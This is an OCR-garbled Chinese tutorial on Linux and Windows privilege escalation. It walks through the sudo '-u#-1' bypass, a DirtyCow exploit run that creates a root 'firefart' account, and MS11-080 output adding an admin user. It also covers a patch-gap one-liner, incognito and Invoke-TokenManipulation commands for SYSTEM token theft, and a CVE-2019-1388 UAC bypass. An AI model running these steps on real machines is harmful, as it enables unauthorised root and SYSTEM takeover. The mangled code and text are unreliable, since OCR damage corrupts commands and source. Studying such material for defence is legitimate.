Ssadmin ALL=(ALL) ALL 


# Allow members of group sudo to execute any command 
%sudo ALL=(ALL:ALL) ALL 


# See sudoers(5) for more information on “#include” directives: 


#includedir /etc/sudoers.d 
# | 





配置 文件 分 析 
% 开 头 ， 代 表 " 将 要 授权 组 "， 例 如 其 中 的 %admin、%sudo。 
9% 不 开头 的 ， 代 表 '" 将 要 授权 的 用 户 “， 例 如 其 中 的 root。 





root ALL=(ALL:ALL) ALL 


第 一 个 ALL 的 意思 是 root 用 户 在 那些 服务 器 上 登录 本 服务 器 来 执行 sudo 命 令 。 
第 二 个 和 第 三 个 ALL 则 表示 可 以 切换 到 任何 (用户 :组 ) 。 
第 四 个 为 ALL， 则 表示 可 以 执行 任意 命令 。 


例如 图 中 ， 已 经 添加 了 
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EE ALL=(ALL:ALL) ALL 


ARSE, MAILAT TASAR root 


do -u#4294967295 id -u 


或 者 64 位 机 ，C 语 言 中 整数 存储 占用 4 个 字 节 ， 一 个 字 节 8 位 ， 共 计 32 位 

在 计算 机 中 以 补 码 形 式 存储 ，-1 的 补 码 为 32 个 1 组 成 的 二 进 制 数 ， 按 无 符号 数 输出 这 个 二 进 制 
182/92-1-4294967295 

PRANTL, IUEUUISEHROUDSENURIEBGER IU, -RETSAG ARAH 


和 显示 为 什么 数 ， 计 算 机 按 编程 者 的 格式 要 求 进行 处 理 输 出 。 如 32 个 1 组 成 的 二 进 制 数 ， 按 %d 输 
了 台 是 -1 ， 按 无 符号 输出 就 是 4294967295。 


# sudo -u#-1 id -u 


# sudo —u#4294967295 id -u 


O nici 
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void 





xec cmnd(struct command details *details, struct command. sta 


int errfd) 


debug decl(exec cmnd, SUDO DEBUG EXEC) 


restore signals(); 


if (exec setup(details, NULL, -1) == true) { 





sudo debug execve(SUDO DEBUG INFO, details-»command, 


details->argv, details->envp); 


sudo_execve(details->command, details->argv, details->envp, 


ISSET(details->flags, CD NOEXEC)); 


cstat-»type - CMD ERRNO; 


cstat-»val = errno; 


sudo debug printf(SUDO DEBUG ERROR, "unable to exec %s: 9s", 





details->command, strerror(errno)); 


debug return; 


其 中 exec_setup,SUD0_DEBUG_EXEC, 可 以 执行 组 D， 及 创建 掩 码 


1256 


VE SETRESUID 





setresuid(details-»uid, details-»euid, details-»euid) !- 9) ( 
Iwarn(U ("unable to change to runas uid (%u, %u)"), details->uid, 


details-»euid); 


| if (seteuid(details-»euid) != © || setuid(details-»euid) !- 0) { 
Sudo warn(U ("unable to change to runas uid (%u, %u)"), details-»uid, 
details->euid); 


goto done; 
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tails, const char *ptyname, int ptyfd) 


f } g z ¥ 


#endif /* !HAVE SETRESUID && !HAVE SETREUID */ 


restore nproc(); 


rval - true; 


done: 


debug return bool(rval); 


通过 源码 分 析 
其 中 有 三 个 函数 可 以 设置 用 户 权 限 


setresuid 
setreuid 


seteuid 





其 中 的 函数 在 root 权 限时 参数 可 以 改变 为 任何 ID， 


sudo 程 序 最 初 会 调用 了 setuid(root_uid) 使 程序 的 进程 获得 的 root 权 限 ,通过 前 面 的 ls -| /usr/bin/sudo 
已 经 检验 过 了 


所 以 这 三 个 函数 都 能 修改 进程 的 用 户 所 获得 的 权限 。 因 为 默认 情况 下 sudo 会 将 权限 提升 为 root 
在 出 现 整数 溢出 的 时 候 ，-1 或 者 4294967295 则 被 判断 为 0 返回 为 真 ， 则 使 得 权限 升级 为 roote 
调用 setuid 将 我 们 的 恶意 用 户 设置 为 root, 从 而 执行 任意 命令 
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stuser 
-ydo -u£-1 whoami 


yt 





0x04 漏洞 修复 


Debian: 


sudo apt-get update & apt-get upgrade 


Sudo apt-get upgrade sudo 


RHEL: 


yum update 


yum update sudo 


最 后 通过 检查 sudo 的 版 本 号 是 否 大 于 等 于 1.8.29 


Sudo -V | grep 'Sudo version' 
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linux 提 权 (一 ) 之 内 核 提 权 


0x0. 前 言 










有 时 候 在 渗透 测试 中 拿 到 一 台 非 管理 员 权限 的 机 器 ， 想 要 利用 这 台 机 器 继续 进行 更 深入 的 渗透 测 
试 。 可 能 会 由 于 当前 的 权限 限制 ， 无 法 很 好 达成 我 们 的 目的 ， 那 么 这 个 时 候 ， 我 们 可 能 需要 用 到 提 
权 ， 因 为 用 户 无 法 访问 〈 读 取 / 写 入 /执行 ) 不 允许 访问 的 文件 。 但 是 ， 超 级 用 户 却 可 以 访问 系统 上 
存在 的 所 有 文件 。 这 篇 文章 讲 的 是 Linuxd 提 权 的 其 中 一 种 方法 利用 内 核 版 本 的 漏洞 进行 提 权 。 


0x1.Linux 内 核 漏洞 提 权 的 原理 


内 核 漏洞 利用 程序 是 利用 内 核 漏洞 来 执行 具有 更 高 权限 的 任意 代码 的 程序 。 成 功 的 内 核 利 用 通常 会 
以 root 命 令 提示 符 的 形式 为 攻击 者 提供 对 目标 系统 的 超级 用 户 访问 权限 。 在 许多 情况 下 ， 升 级 到 
Linux 系 统 上 的 根 目 录 就 像 将 内 核 漏洞 利用 程序 下 载 到 目标 文件 系统 ， 编 译 该 漏洞 利用 程序 然后 执行 
它 一 样 简单 。 而 它 的 工作 流程 : 


1. 诱 使 内 核 在 内 核 模式 下 运行 我 们 的 有 效 EXP 2. 处 理 内 核 数据 3. 以 新 的 特权 启动 Root 权限 


B Linux 内 核 版 本 的 提 权 的 攻击 条 件 和 可 能 导致 提 权 失败 的 


考虑 到 要 成 功利 用 内 核 利 用 攻击 ， 攻 击 者 需要 满足 以 下 四 个 条 件 : 


1. 内 核 版 本 在 可 以 利用 的 范围 之 内 2. 拥 有 匹配 内 核 版 本 的 EXP 3. 拥 有 上 传 文件 的 权限 4. 对 上 传 文件 
的 目录 具有 执行 的 权限 


内 核 提 权 漏洞 可 能 失败 的 原因 : 


1: 机 器 保持 内 核 的 补丁 和 更 新 。 2: 在 没有 补丁 的 情况 下 ， 管 理 员 可 以 极 大 地 影响 在 目标 上 传输 和 
执行 漏洞 利用 程序 的 能 力 。 考 虑 到 这 些 考虑 因素 ， 如 果 管理 员 可 以 阻止 将 利用 程序 引入 和 /或 执行 到 
Linux 文 件 系 统 上 ， 则 内 核 利 用 程序 攻击 将 不 再 可 行 。 并 且 如 果 管 理 员 专注 于 限制 或 删除 支持 文件 传 
输 的 程序 ， 例 如 FTP，TFTP，SCP，wget 和 curl。 并 将 它们 的 使 用 限制 为 特定 的 用 户 ， 目 录 ， 应 用 
程序 〈 例 如 SCP) 和 特定 的 IP 地 址 或 域 也 会 造成 Linux 内 核 提 权 失败 。 


0x3. 关 于 内 核 提 权 的 复 现 


这 里 使 用 名 躁 一 时 的 CVE-2016-5195({DirtyCow) 漏 洞 来 做 示范 。CVE-2016-5195 漏 洞 影响 的 内 核 版 
本 区 间 : 2.6.22<=Linux 内 核 在 Linux 内 核 的 内 存 子 系统 处 理 私 有 只 读 内 存 映 射 的 写 时 复制 (COW) 
损坏 的 方式 中 发 现 了 一 种 竞争 状况 。 一 个 没有 特权 的 本 地 用 户 可 能 会 利用 此 漏洞 获得 对 其 他 情况 下 
只 读 内 存 映射 的 写 访 问 权 限 ， 从 而 增加 他 们 在 系统 上 的 特权 。 这 是 有 史 以 来 最 严重 的 特权 升级 漏洞 
之 一 ， 直 到 修复 之 前 ， 它 几乎 影响 了 所 有 主要 的 Linux 发 行 版 内 核 版 本 。 


REL: Ubuntu 18.04.1 内 核 版 本 4.15.0-29-generic 
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E 


E rkgubuntu:-$ cat /etc/issue# 查 看 发 行 版 本 
? as 


SnkQubuntu: -$ uname -r£Z&ptzhkzk 





sink@ubuntu: ~ 


edit View Search Terminal Help 
anhuntits oS. 


5.0-29-generic 


在 判断 版 本 之 后 我 们 可 以 在 exploit-db 中 可 以 寻找 到 相应 的 利用 exp 


e © à exploit-db.com a B Heo 





x T 
* 

b. ( » 

M A 

t & 


+ 


也 可 以 在 msf 中 也 可 以 搜索 可 以 利用 的 exp 
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{ Path 
| (Zusr/share/exploitdb/) 
- 'allow userns' Fuse/Xattr exploits/ 761 
11,64/11.10) - Boundary Crossing Privilege Escalation exploits/? int 228; sh 
/ Debian) - CGI TTY Privilege Escalation exptoits/! six/local/3384, - 
14.04/14.10/15.04) - Race Condition Privilege Escalation exploits /1ocal/37088. 
14.04.2) = Local Privilege Escalation exploits/<ini</local36782 sh 
15.04) - Local Privilege Escalation exploits/iini»/10c21/38353 tx 
Desktop 12.18 < 16.04) ~ Local Code Execution exploits/i:5:»/10cal/40937 t,t 
/ Fedora) - Local Privilege Escatation exploits/13503/10621/36746, c 
Exim 4 (Debian 8 / 16.04) - Spool Privilege Escalation exploits/iisix/local/40054. ¢ 
FTP Client ( 11.04) - Local Buffer Overflow Crash (PoC) exploits/ */do5/17806 ,txt 
FTP Client 0.17-19buildl ACCT ( 10.04) - Buffer Overflow (PoC) exploits/!i:5*/dos/14452. txt 
iGoogle Chrome {Fedora 25 / 16.04) - 'tracker-extract' / ‘gnome-video-thumbnailer’ + 'totem' Drive-By Download exploits/ */Local/49943, ty + 
LightoM { 16.94/16.180) - ‘Guest Account’ Local Privilege Escalation exploits/\iix/locat/41923, txt 
{ ) + Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass exploits/ </dos/45633 NE 
Kernel (Debian 7.7/8.5/9.0 / 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso hwcap 64 Stack Clash" Lo | exploits/1::5* x86-64/local/42775 
Kernel (Debian 9/10 / 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso' dynamic Stack Clash’ Local Privilege Escalatio | exploits/l itir x88/l0cal/42276.. 
Kernel / Fedora / RedHat) ~ ‘Overlayfs* Local Privilege Escalation (Metasploit) exploits/ii5sux/local/40688.rb | 
Kernel 12.10/12,64) - binfmt script Stack Data Disclosure exploits/ 1x/d05/41767 txt 
Kernel 14.84.3) ~- ‘perf_event_open({}" Can Race with execve{) (Access /etc/shadow) exploits/% inux/local/39771. txt 
Kernel 16.04) - Reference Count Overflow Using BPF Maps exploits/{inuy/d0s/39773. txt 
Kernel 17.04) - 'XFRM' Local Privilege Escalation exploits/1inu*/local/44o49, md 
Kernel .X/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 16 SP2/11 7 8,16) (PPC) --’sock_sendpage()" Local Privilege | exploits/iisux/local/9545.c 
Kernel (Debian 4.0 / / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation {1} exploits/ /local/g478. sh 
Kernel (Gentoo / 8.10/9,04) UDEV < 1.4.1 - Local Privilege Escalation (2) exploits/ /locat/8572. c 
Kernel 20/2.6.24/2,6.27 7-10 ( 7.04/8.04/8.18 / Fedora Core 19 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remot | exploits/ /remote/8556. c 
Kernel -24_16-23/2.6.27_7-10/2.6.28.3 ( 8.04/8.10 / Fedora Core 10 x86-64) - 'set selection()' UTF-8 Off-by-One Pri | exploits/1:5:*.X86-64/local/9053.. 


在 此 平台 也 有 整理 好 的 版 本 对 应 的 可 以 使 用 的 相应 的 exp 的 编号 





< A greatagain.dbappsecurity.com.cn kl 6 


GreatAgain 


(Linux kernel through 4.1 


i 7-5123  ['waitid()'] 


a-reas) 


[a signedness issue with DBUFFORCE SO RCVBUFFORCE socket options] 


(Linux kernel before 4 


CVE- 





也 可 以 在 github 上 寻找 相应 的 exp 即 可 


& github.com 5 a t 











Find file 





然后 这 里 我 们 使 用 的 EXP 的 地 址 
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我 们 imp 目录 下 的 权限 
























at 
E 
peru: tnp E 
1AnpkO 
tib.cache.7bqcu lp 
dALCCZj è 
rivate-e9111011c1344eb090664b67971debc0-bolt.service-e3nVLk 
private-e9111011c1344eb090664b67971debc0-colord.service-7KdON7 
rivate-e9111011c1344eb090664b67971debcO8-fwupd.service-oxX7YM 
rivate-e9111011c1344eb090664b67971debcO-rtkit-daemon.service-YC3jtg 
rivate-e9111011c1344eb090664b67971debcO-systemd-resolved.service-RFByGt 
private-e9111011c1344eb090664b67971debcO-systemd-timesyncd.service-G3Xgp 


rr- 


ot_753-4290035625 
untu: /tmp$ ts -U 
A 40 
-- 1 sink sink © Dec 
| ..----- 2 sink sink 4096 Dec 
2 sink sink 4096 Dec 
root root 4096 Dec 
cO-bolt.service-e3nVLk 
----- 3 root root 4096 Dec 3 01:24 systemd-private-e9111011c1344eb090664b6 
0-colord.service-7KdON7 
- 3 root root 4096 Dec 3 61:25 systemd-private-e9111011¢1344eb090664b6 
:bcO-fwupd.service-oxX7YMW 


把 itty 文 件 放 在 tmp 目 录 下 ， 具 体 场 景 以 实际 情况 为 准 利用 gcc 编 译 dirty.c 文 件 


61:25 config-err-1AnpkO 

61:26 launchpadlib.cache.7bqcu lp 

01:25 ssh-Lia2pdALCcZj 

01:24 systemd-private-e9111011c1344eb090664b6 


w w UJ w 


w 


Sink@ubuntu:~$ gcc -pthread dirty.c -o dirty -lcrypt 
Sink@ubuntu:~$ ./dirty pws (你 的 密码 ) 













e-root 2771-4248809489 
nékQubuntu:/tmpS ./dirty sink123 

etc/passwd successfully backed up to /tmp/passwd.bak 

Please enter the new password: sink123 

omplete line: 

firefart:fijpQXaDRCnzY:0:0:pwned: /root: /bin/bash 





nap: 7f7753b78000 
nadvise 6 









ptrace 9 
Done! Check /etc/passwd to see if the new user was created. 
YOU can log in with the username 'firefart' and the password 'sinki123'. 







DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd 
Done! Check /etc/passwd to see if the new user was created. 
You can log in with the username 'firefart' and the password 'sinki123'. 


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd 


成 功 。 接 下 来 用 su 切换 登录 即 可 。 


0x04. 总 结 


RA, REIT MAA BIA Soothe BBA, (BIESIVIARRÉCE IEA RANA, im 
程 主机 可 能 会 崩溃 ， 因 为 许多 公开 可 用 的 根 漏洞 利用 程序 不 是 很 稳定 。 2. 您 可 能 会 成 为 root 用 户 ， 


然后 使 盒子 朋 溃 。 3. 漏 酒 利 用 可 能 会 留 下 痕迹 /日 志 。 


0x05. 目 动 化 工具 


下 面 分 享 一 个 内 核 提 权 自动 识别 的 自动 化 工具 


安全 分 析 师 经 常 在 渗透 测试 参与 期 间 面 临 识别 被 测 Linux 机 器 上 特权 提升 攻击 向 量 的 问题 。 可 行 的 攻 
击 媒 介 之 一 是 使 用 众所周知 的 Linux 漏 洞 利用 来 获得 被 测 机 器 的 root 特 权 。 当 然 ， 为 了 做 到 这 一 点 ， 

分 析 师 需要 识别 正确 的 PoC 漏 洞 ， 请 确保 其 目标 受 相 关 漏洞 的 影响 ， 最 后 修改 漏洞 以 适合 其 目标 。 

linux-exploit-suggester.sh 工 具 旨 在 帮助 完成 这 些 活动 。 


用 法 : https: //github.com/mzet-/linux-exploit-suggester#usage 
Xm: https://payloads.online/archivers/2018-12-19/linux-privilege 


sinkQubuntu:/tmp$ chmod 777 les.sh 
sinkQubuntu:/tmp$ ./les.sh 


sink@ubuntu: /tnpS chmod 777 les.sh 
sink@ubuntu:/tmp$ ./les.sh 


Available information: 


Kernel version: 4.15.0 

Architecture: x86 64 

Distribution: ubuntu 

Distribution version: 18.04 

Additional checks (CONFIG *, sysctl entries, custom Bash commands): performed 
Package listing: from current OS 


Searching among: 


72 kernel space exploits 
42 user space exploits 


Possible Exploits: 


[+] [CVE-2019-7304] dirty sock 


Details: https://initblog.com/2019/dirty-sock/ 
Exposure: less probable 
Tags: ubuntu=18.10,mint=19 
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windows 提 权 - 快 速 查找 exp (第 一 课 ) 
微软 官方 时 刻 关注 列表 网 址 : 


安全 通报 和 公告 > 安全 公告 > 


2017 


^ 


比如 常用 的 几 个 已 公布 的 exp: KB2592799, KB3000061, KB259279955, 


快速 查找 未 打 补丁 的 exp， 可 以 最 安全 的 减少 目标 机 的 未 知 错误 ， 以 免 影响 业务 。 命令 行 下 执行 检 
测 未 打 补 丁 的 命令 如 下 : 





systeminfo»micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KE 
> 
注 : 以 上 需要 在 可 写 目录 执行 。 需 要 临时 生成 micrpoor.txt， 以 上 补丁 编号 请 根据 环境 来 增删 。 
一 般 实战 中 在 类 似 tmp 有 目录 等 可 写 目 录 下 执行 : ICM mp» 以 11-080 为 例 


C:\NTEMP>systeminfo>micropoor.txt&lfor zi in €  KB977165 KB2160329 KB25@3665 KB25 
922799 KB2707511 KB2829361 KB285@851 KB3808061 KB3045171 KB3077657 KB3079904 KB 
3134228 KB3143141  KB3141780 > do @type micropoor.txti@find /i "zi"!! Recho Zi 
you can Fuck>&del /f 7q Za micropoor.txt 
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TELE! y 
unoagé2ube h\mic ropoor 


net user micropoor 
r name 
1] Name 
ment 
ws comment 
ntry code 
ount active 
ount expires 


vord last set 

word expires 

vord changeable 
cyord required 

» may change password 


skstations allowed 
jon script 
er profile 
ne directory 
ast logon 
jon hours allowed 


ocal Group Memberships 
obal Group memberships 


micropoor 


pee System Default? 
es 
Never 


11/17/2817 11:05 PM 
12730/2017 9:52 PM 

11/17/2017 11:85 PM 
Yes 

Yes 


All 


11/17/2017 11:05 PM 
All 


«Users 
xNone 


command completed successfully. 


C:\TEMP>MS11_8@6_k8 .exe 
[>] ns11-88 Exploit 
[*] Token system command 


[x] command add user k8team k8team 


C:\TEMP>net user k8team 
User name 

Full Name 

Comment 

User’s comment 

Country code 

Account active 

Account expires 


‘assword last set 
Password expires 

ssword changeable 
ssvord required 

r nay change password 


Workstations allowed 
:0d0n. script 

Jser profile 

lome directory 

“ast logon 


“gon hours allowed 





Local Group Memberships 
Global Group memberships 


The command completed succes 


C:\TEMP> 


k8tean 
k8tean 


888 <System Default? 
Yes 
Never 


11/17/2017 11:11 PM 
12/30/2017 9:59 PM 
11/17/2017 11:11 PM 
Yes 
Yes 


All 


Never 
All 


idministrators 
xNone 


sfully. 

































































MS17-017 


CVE-2017-8464 
CVE-2017-0213 


MS17-010 
MS16-135 
MS16-111 
MS16-098 
MS16-075 
MS16-034 
MS16-032 
MS16-016 
MS15-097 
MS15-076 
MS15-077 
MS15-061 
MS15-051 
MS15-010 
MS15-015 
MS15-001 
MS14-070 
MS14-068 
MS14-058 
MS14-040 
MS14-002 
MS13-053 
MS13-046 
MS13-005 
MS12-042 
MS12-020 
MS11-080 
MS11-062 
MS11-046 
MS11-011 
MS10-092 
MS10-065 
MS10-059 
MS10-048 
MS10-015 
MS10-012 
MS99-050 
MS99-020 
MSO9-012 
MSO8-068 
MSO8-067 
MSO8 -066 
MS08-025 
MS06-040 


[KB4013081] 


[KB4013389] 
[KB3199135] 
[KB3186973] 
[KB3178466] 
[KB3164038] 
[KB3143145] 
[KB3143141] 
[KB3136041] 
[KB3089656] 
[K83067595] 
[KB3077657] 
[KB3057839] 
[KB3057191] 
[KB3036220] 
[KB3031432] 
[KB3023266 ] 
[KB2989935 ] 
[K83011780] 
[K83009961] 
[KB2975684] 
[KB2914368] 
[KB2850851 ] 
[KB2840221 ] 
[KB2778930] 
[KB2972621] 
[KB2671387 ] 
[KB2592799] 
[KB2566454] 
[KB2503665] 
[KB2393802] 
[KB2305420] 
[KB2267960] 
[KB982799] 
[KB2160329] 
[KB977165] 
[KB971468] 
[KB975517] 
[KB970483] 
[KB959454] 
[KB957097] 
[KB958644] 
[1 [1 
[KB941693] 
[KB921883] 


[LNK Remote Code Execution Vulnerability] 
[Windows COM Elevation of Privilege Vulnerability] 


(Windows 2000/XP/Server 2003) 















[GDI Palette Objects Local Privilege Escalat 
(windows 


[windows Kernel Mode Drivers] (windows 772 
[Windows Kernel Mode Drivers] (2016) 


[kernel api] (Windows 10 10586 (32/64)/8,1y 


[Kernel Driver] (Win 8.1) 
[Hot Potato]  (2003/2008/7/8/2012) 
[Kernel Driver] (2008/7/8/10/2012) 


[Secondary Logon Handle] 
[WebDAV] (2008/Vista/7) 
[remote code execution] (win8.1/2012) 
[RPC] — (2003/2008/7/8/2012) 
[ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012 
[Kernel Driver] (2003/2008/7/8/2012) 1 
[Windows Kernel Mode Drivers] (2003/2008/7/8/ 
[Kernel Driver] (2003/2008/7/8) a 
[Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/28 
[Kernel Driver] (2008/2012/7/8) 
[Kernel Driver] (2003) ] 
[Domain Privilege Escalation] (2003/2008/2012/7 
[Win32k.sys]  (2003/2008/2012/7/8) 
[AFD Driver]  (2003/2008/2012/7/8) 
[NDProxy] (2003/XP) 

[win32k.sys] (XP/Vista/2003/2008/win 7) 
[dxgkrnl.sys] (Vista/2003/2008/2012/7) 
[Kernel Mode Driver] (2003/2008/2012/win7/8) 
[Service Bus] (2008/2012/win7) 

[RDP]  (2003/2008/7/xXP) 

[AFD.sys] (2003/XP) 

[NDISTAPI)  (2003/XP) 

[AFD.sys]  (2003/2008/7/XP) 

[kernel Driver] (2003/2008/7/XP/Vista) 

[Task Scheduler] (2008/7) 

[FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5) 
[ACL-Churraskito] (2008/7/Vista) 
[win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SF 
[KiTrap0D] (2003/2008/7/XP) 1 
[SMB Client Trans2 stack overflow] (Windows 7/2008 
[Remote Code Execution] (2008/Vista) 
[IIS 6.0] (IIS 5.1 and 6.0) 
[Chimichurri] (Vista/win7/2008/Vista) 
[Remote Code Execution] (2000/XP) 
[Remote Code Execution] (Windows 2000/XP/Server 209 


(2008/7/8/10/2012). 


[Win32.sys] (XP/2003/2008/Vista) 
[Remote Code Execution] (2003/xp/2000) 
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399588 | [PnP Service] (Win 9X/ME/NT/2000/XP/2003) É k 
23980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003) 


> 





1269 


Token £i B Ef FH 





— 


Nindows P Invoke-TokenManipulation.psBA zs 
工具 : incognito.exe, Invoke-TokenManipulation.ps1 


默认 情况 下 ,当前 用 户 肯定 是 只 能 看 到 当前 用 户 自己 和 比 自 己 权限 低 的 所 有 访问 令 牌 


1.windows 下 incognito 工 具 exe 


列举 token:  incognito.exe list tokens -u 


复制 token:  incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
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w 


b f n A = 多 
inistrator\Desktop\ma\incognito2>incognito.exe list tokens -u 


| Tokens Available 


ITY\LOCAL SERVICE 


lv 


RITY\NETWORK SERVICE 
197 2BD54\Administrator 


ion Tokens Available 


tokens available 


Strative Privileges Available 


e0 nershipPrivilege 


kupPrivilege 
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SeDebugPrivilege 了 
SeImpersonatePrivilege 
SeRelabelPrivilege 


SeLoadDriverPrivilege 


C:\Users\Administrator\Desktop\ma\incagnita2>whoami 


qyi-5b1b972bd54\administrator 
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B. i 1 : * pany 
ninistrator \Desktop\ma\incognito2>incognito.exe execute -C "NT AUTHOR 


Not running as SYSTEM. Not all tokens will be available. 
ting tokens 
E. for availability of requested token 


i 
Nu 


ted token found 


ityNsystem 


dministrator\Desktop\ma\incognito2> 
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t- 1 WARNING: Not PURA TOU a as SVSTEM. Not all 
{*] Enumerating tokens 
{*] Listing unique users found 


he ioe Tokens Available 


INT AUTHORITY\LOCAL SERVICE | 
INT AUTHORITY\NETWORK SERUICE 
[NT AUTHORITY \SYSTEM 
QYI-5SB1B972BD54\Administrator 


Impersonation Tokens Available 
[~] No tokens available 
Administrative Privileges Available 


SeAssignPrimaryTokenPrivilege 
SeCreateTokenPrivilege 
SeTchPrivilege 
SeTakeOQunershipPrivilege 
SeBackupPrivilege 
SeRestorePrivilege 
SeDehugPrivilege 
SelmpersonatePrivilege 

SeRe labe 1Privilege 
SeLoadDriverPrivilege 


C: Users Adnin MERDA KEEN PR ito2>whoani 
T yi-Sib972bd5p\adnin istrator | 
i 
:Nsers Adninistrator\Desktopnavincognitod incognito.exe execute -c "NI AUTHORITY \SYSTEM” cnd.exe 
WARNING: Hot running as SYSTEM. Not all eehene—wi-li—bo—avet 
Enunerating tokens 
Searching for availability of requested token 
Requested token found 
Delegation token available 
Attenpting to create new child process and communicate via anonymous pipe 


1 ft Windows [REF 6.1.7681] 
WAV PRS <c) 2089 Microsoft Corporation 


3 ;Nsers Midnministrator\Desktop\na\incognito2 {unoani| 


Q, ani 


bt authoritgNsysten 


:Wsers MidninistratorNDesktopNsaNincognito25, 


2. windows FInvoke-TokenManipulation.psBi zl 


原理 和 功能 同 incognito 类 似 ， 能 够 实际 提 权 和 降 权 
列举 token: Invoke-TokenManipulation -Enumerate 


提 权 至 system: Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt 
authority\system" 


复制 进程 token: Invoke-TokenManipulation -CreateProcess "cmd.exe" -Processid 500 


复制 线程 token: Invoke-TokenManipulation -CreateProcess “cmd.exe” -Threadld 500 





> 







管理 员 使 用 需要 以 管理 员 身 份 启动 的 软件 时 ， 出 现 的 JUAC (User Access 
T 该 提示 是 由 进程 Consent.exe 提 供 ， 在 cvE-2019-1388 漏洞 中 ， 利 用 了 UAC 中 
得 以 实现 。 


( 低 版 本 ) 


ide s Server 2008 R2 为 例 创建 本 地 用 户 组 成 员 user ， 如 下 
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Everyone mre Z meg East Fis 必需 的 组 。 
局 用 的 组 E 
BUILTINNUsers Pl 名 $-1-5-32-545 4^3E BER. 


$-1-5-4 
=A S-1-2-1 
A S$-1-5-11 


] $-1-5-15 


| $-1-2-8 


ga 
wm 


$-1-5-64-10  J^zEDJiB. 


Dh Bu Du. oO DD B0 BU. DD. DD 


gn dB G8 dB BBR BB 
S miu ae e 


TTA $-1-316-8192- 4^2 BER. 





对 于 UAC 自 Windows Vista 开 始 就 是 微软 加 入 到 系统 中 的 一 个 权限 控制 机 制 ， 即 通知 客户 是 否 局 用 
某 些 文件 或 者 程序 













常规 | 详细 信息 | 证 书 路 径 | b 
r E a 
证 书信 息 | 
这 个 证 书 的 目的 如 下 a | 
(“x BEEN Microsoft Windows -IRRIS RIFES b 
47 GAERTETA Microsoft Corporation 。 保 护 软 件 在 发 行 后 不 被 更改 









此 ain itt peg E 


ram E 1 )Nntert 





SS, DERAF, MESS 颁发 给 Microsoft Corporation 





BRA Microsoft Code Signing PCA 


HABRA 2008/7 10/ 23 到  2010/ 1/ 23 





BL ID 
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Bt 


(RAUACHNEN, Ad 显示 有 关 此 发 布 者 的 证 书 的 信息 会 出 现 相关 软件 的 发 布 
多 发 现在 大 量 的 证 书 显示 过 程 中 ， 都 是 没有 可 利用 的 链接 ， 换 句 话说 出 了 是 / 否 / 确 
tgp nene. 


SREB, (ETAUZGAxBuEB(G E, HEITGED, MRERW— 
三 Windows 证 书 的 程序 ， 以 至 于 我 们 可 以 利用 它 来 进行 权限 提升 ， 接 下 来 是 操作 


MOOS 


^ 





Sete RIPE Mi |a | 
Microsoft Co... 不 可 用 














， 数 字 签 名 信息 
此 数字 签名 正常 
签名 人 信息 C) 
详细 信 名 称 : Microsoft Corporation | 
电子 邮件 : 示 可 用 
签名 时 间 :; 2000 年 3 月 7 日 553:23 
查看 证 书 U | 
RISE QD 
签名 人 姓名 : 电子 邮件 地 址 : ”时 间 战 
VeriSign Tim 不 可 用 2000 年 3 月 ?日 5:. 
z R 
we | m» | 


FFI HHUPD.exe 是 微软 的 一 个 程序 ， 其 证 书信 息 如 上 
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Wicrosoft Corporation 


常规 | 详细 信息 | 证 书 路 径 | 


A ”证 书信 息 


这 个 证 书 的 目的 如 下 : 
“确保 软件 未 自 软件 点 布 者 
“保护 软件 在 发 行 后 不 被 更 改 








D. Help ActiveX Control 给 - 
BHIDE: Ri yosoft Corporation "P 
文件 源 此 计算 机 上 的 硬盘 驱动 器 à E 
程序 位 置 “C: \Users\user\Desktop\HHUPD. EXE” BRA: VeriSign Commerc a are Publishers = 


baat bate eke eels 


Microsoft Corpax d o 


有 效 期 从 — 1999/ 3/ 19 到 — 2000/ 4/ 17 
EE. AM OEESATO MERE“ E” -o 


a| 隐藏 详细 信息 0) 





以 管理 员 权限 打开 ， 出 现 UAC 提 示 界 面 ， 点 击 “显示 有 关 此 发 布 者 的 证 书 的 信息 ， 出 现 该 软件 的 证 书 、 
详情 ， 可 以 看 到 这 里 颁发 者 以 超 链 接 的 形式 出 现 ， 我 们 点 击 试 试 。 
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P 
Digital Signature, Key .. 
ns Anais KeyID=7b 96 e4 dl 43 fd... 
1 Subject Type=End Entity... 
/ 30 2d 30 2b a0 29 aD 27.. 
SpcFinancialCriteria Financial Information=. . 
| 密 钥 用 法 限制 [1]Cert PolicyId-1.3.8 
pcSpAgencyInfo Policy Information: URL=... xi 
ue 3. 了 | 
cy Information: p 
和 WRL-https://www. verisign. com/repository/CPS 
licy Display-This certificate incorporates by 
ference, and its use is strictly 
abject to, the VeriSign Certification Practice 
Latement (CPS) 
sion 1.0, available --n the VeriSign repository at: 
ttps: ff www. verisign. A by E-mail at CPS- 
&questsüverisign com; or x 


4 
竹下 证 书 对 话 框 出 现 的 超 链 接 : 微软 定义 了 一 个 模糊 的 概念 ， 特定 对 象 标识 符 (OID) , 
效 值 1.3.6.1.4.1.311.2.1.10。 而 WinTrust.h 头 文件 中 将 其 定义 为 

SP AGENCY INFO_OBJID。 官 方 文档 中 关于 sPC sP AGENCY INFO OBJID 比较 少 ， 但 是 
以 看 到 在 格式 正确 的 情况 下 ， 可 以 在 颁发 者 中 显示 超 链接 ， 也 可 能 是 微软 没有 禁 t FATS IZ EB bt 


mm 
RIA 
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c Internet Exp 


© verisign com rer 


“收藏 来 
E & Internet Explorer ... X € EGER... 








点 击 完成 之 后 ， 然 后 点 击 证 书 界 面 的 确定 按钮 ，UAC 界 面 的 Ain) 按钮 ， 发 现 出 现 


了 Internet Explorer 





要 知道 浏览 器 是 可 以 打开 文件 的 ， 开 始 试验 一 下 






verisign. com t v +p 





f tindows Internet Explorer 


A €» j ^. Windows > System32 x 
| Bash 组 织 + RBS 
